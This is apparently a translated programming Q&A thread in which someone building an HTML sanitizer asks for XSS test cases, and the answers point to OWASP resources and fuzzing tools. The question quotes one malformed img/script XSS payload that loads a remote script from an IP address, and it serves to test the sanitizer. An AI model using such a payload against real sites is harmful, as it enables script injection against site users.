18

我正在寻找编写一个 html 清理程序,显然为了测试/证明它可以正常工作,我需要一组 XSS 示例来反对它,看看它是如何执行的。这是来自 Coding Horror 的一个很好的例子

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

我知道有一个Mime Torture Test,其中包含几个嵌套的电子邮件,其中包含用于测试 Mime 解码器的附件(如果它们可以正确解码,那么它们已被证明有效)。我基本上是在寻找 XSS 的等价物,即我可以扔给我的消毒剂的狡猾 html 的示例列表,以确保它可以正常工作。

如果有人也有任何关于如何编写消毒剂的好资源(即人们尝试使用的常见漏洞等),他们也会受到感激。

提前致谢 :-)

编辑:抱歉,如果之前不清楚,但我经过了一系列折磨测试,所以我可以为消毒剂编写单元测试,而不是在浏览器中测试它等等。理论上源数据可能来自任何地方 -不仅仅是一个浏览器。

4

4 回答 4

18

看看这个 XSS 作弊列表:https ://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

于 2008-11-01T16:27:25.583 回答
7

XSS Me是一个很棒的 Firefox 插件,你可以在你的 sanitizer 上运行。

于 2008-11-01T16:29:12.507 回答
2

查看OWASP。他们对 XSS 的工作原理、寻找什么,甚至WebGoat项目都有很好的指导,您可以在其中尝试在易受攻击的网站上动手。

于 2008-11-01T16:33:37.787 回答
2

您可以尝试 Jesse Ruderman 的 jsfunfuzz ( http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/ ),它会在您的 Javascript 中抛出随机数据以试图破坏它。Firefox 团队似乎在使用它方面取得了巨大成功。

于 2008-11-01T16:37:20.447 回答